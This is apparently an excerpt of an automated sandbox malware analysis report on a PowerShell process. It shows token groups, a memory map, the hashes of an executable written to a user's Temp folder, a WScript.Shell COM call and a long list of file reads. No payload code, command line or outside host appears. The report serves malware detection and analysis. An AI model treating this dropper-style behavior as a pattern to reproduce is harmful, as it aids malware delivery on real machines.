Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AD8 0x AEC 0x AF0 0x AF4 0x AF8 0x AFC 0x B10 0x B20 0x B24 0x B28 0x B30 0x B34 0x B5C 0x B6C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000170000	0x00170000	0x00171fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000180000	0x00180000	0x00180fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00191fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x001a0000	0x001a3fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x001a0000	0x001a3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001bffff	Private Memory	Readable, Writable	Region Actions Download Dump
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x001c0000	0x001dffff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001fffff	Private Memory	Readable, Writable	Region Actions Download Dump
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db	0x00200000	0x0022ffff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x00230000	0x00233fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000280000	0x00280000	0x00280fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000290000	0x00290000	0x00290fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000002a0000	0x002a0000	0x002a0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003b0000	0x003b0000	0x00477fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000480000	0x00480000	0x00580fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000590000	0x00590000	0x0118ffff	Pagefile Backed Memory	Readable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01190000	0x011f5fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001200000	0x01200000	0x0120ffff	Private Memory		Region Actions Download Dump
private_0x0000000001210000	0x01210000	0x0121ffff	Private Memory		Region Actions Download Dump
private_0x0000000001220000	0x01220000	0x0122ffff	Private Memory		Region Actions Download Dump
private_0x0000000001230000	0x01230000	0x0126ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000001270000	0x01270000	0x0134efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001350000	0x01350000	0x0135ffff	Private Memory		Region Actions Download Dump
private_0x0000000001360000	0x01360000	0x0136ffff	Private Memory		Region Actions Download Dump
private_0x0000000001370000	0x01370000	0x0137ffff	Private Memory		Region Actions Download Dump
private_0x0000000001380000	0x01380000	0x0138ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001390000	0x01390000	0x013cffff	Private Memory	Readable, Writable	Region Actions Download Dump
l_intl.nls	0x013d0000	0x013d2fff	Memory Mapped File	Readable	Region Actions
private_0x00000000013e0000	0x013e0000	0x013e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x013f0000	0x013f4fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001400000	0x01400000	0x0143ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01440000	0x0170efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001710000	0x01710000	0x0180ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001810000	0x01810000	0x01c02fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c10000	0x01c10000	0x01caffff	Private Memory	Readable, Writable	Region Actions Download Dump
microsoft.wsman.runtime.dll	0x01cb0000	0x01cb7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000001cc0000	0x01cc0000	0x01cfffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001d00000	0x01d00000	0x01d3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001d40000	0x01d40000	0x01d40fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d50000	0x01d50000	0x01d50fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001d50000	0x01d50000	0x01d5ffff	Private Memory		Region Actions Download Dump
pagefile_0x0000000001d60000	0x01d60000	0x01d70fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001d80000	0x01d80000	0x01dbffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortkey.nlp	0x01dc0000	0x01e00fff	Memory Mapped File	Readable	Region Actions
system.transactions.dll	0x01e10000	0x01e52fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000001e60000	0x01e60000	0x01e6ffff	Private Memory		Region Actions Download Dump
private_0x0000000001e70000	0x01e70000	0x01e7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001e80000	0x01e80000	0x03e7ffff	Private Memory	Readable, Writable	Region Actions
mscorrc.dll	0x03e80000	0x03ed3fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003ee0000	0x03ee0000	0x03eeffff	Private Memory		Region Actions Download Dump
private_0x0000000003ef0000	0x03ef0000	0x03f2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x03f30000	0x04211fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x04220000	0x042dffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000042e0000	0x042e0000	0x042effff	Private Memory		Region Actions Download Dump
private_0x00000000042f0000	0x042f0000	0x042fffff	Private Memory		Region Actions Download Dump
private_0x0000000004300000	0x04300000	0x0430ffff	Private Memory		Region Actions Download Dump
private_0x0000000004310000	0x04310000	0x0431ffff	Private Memory		Region Actions Download Dump
private_0x0000000004320000	0x04320000	0x0432ffff	Private Memory		Region Actions Download Dump
powershell.exe	0x220b0000	0x22121fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x5c740000	0x5c853fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x5c860000	0x5c963fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x5c970000	0x5cea5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x5ceb0000	0x5cf72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x5cf80000	0x5d11dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x5d120000	0x5d1bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x5d1c0000	0x5d244fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x5d250000	0x5d484fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x5d490000	0x5dd09fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.dll	0x5dd10000	0x5dff1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x5e000000	0x5e79bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x5e7a0000	0x5f297fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x5f2a0000	0x5f84afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x5fa50000	0x5fad0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x60340000	0x60347fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x60590000	0x60607fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x60610000	0x60659fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.dll	0x67aa0000	0x67ae2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x6b300000	0x6b34afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x6b750000	0x6b77cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x6d9e0000	0x6d9e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x6d9f0000	0x6da1dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x6e620000	0x6e62afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x6fb80000	0x6fbcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x723b0000	0x7244afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x72460000	0x72464fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x727f0000	0x72814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x73300000	0x7336ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73cf0000	0x73d2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x741b0000	0x741b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741e0000	0x741f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74460000	0x74480fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x745b0000	0x746a4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x746f0000	0x7488dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x74c60000	0x74c68fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74dc0000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74f80000	0x74fbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x751e0000	0x751f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x755b0000	0x755c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75660000	0x7566bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x75710000	0x7571afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x75790000	0x757a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x759b0000	0x759d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x760d0000	0x760d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76140000	0x76184fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x76190000	0x7632cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76460000	0x764e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd4000	0x7ffd4000	0x7ffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 73 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\atveydl98z\appdata\local\temp\38763.exe	84.00 KB (86016 bytes)	MD5: 1b1e6729790854252dfba6c77f198a4e SHA1: 327c94b435802f77d12913956b28c70d00ab2de5 SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98		File Actions Show Properties Download

Host Behavior

COM (2)

Operation	Class	Interface	Additional Information	Success	Count	Logfile
Get Class ID			cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell		1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER		1	Fn

File (326)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config	type = file_attributes	3	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Users\ATVeyDl98Z	type = file_attributes	5	Fn
Get Info	C:\	type = file_attributes	6	Fn
Get Info	C:\Users\ATVeyDl98Z\Desktop	type = file_attributes	9	Fn
Get Info	C:\Users	type = file_attributes	4	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = file_attributes	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = file_type	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = size, size_out = 0	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	type = file_type	2	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	type = file_attributes	3	Fn
Open	STD_INPUT_HANDLE		1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 4096	3	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 3315	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 781, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 4096	41	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 436	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 2530	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 542, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4096	5	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4018	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 78, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 2762	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 310, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 4096	17	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 3022	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 50, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 281	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 4096	62	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 3895	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 201, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 4096	21	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 3687	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 409, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 2228	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 844, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
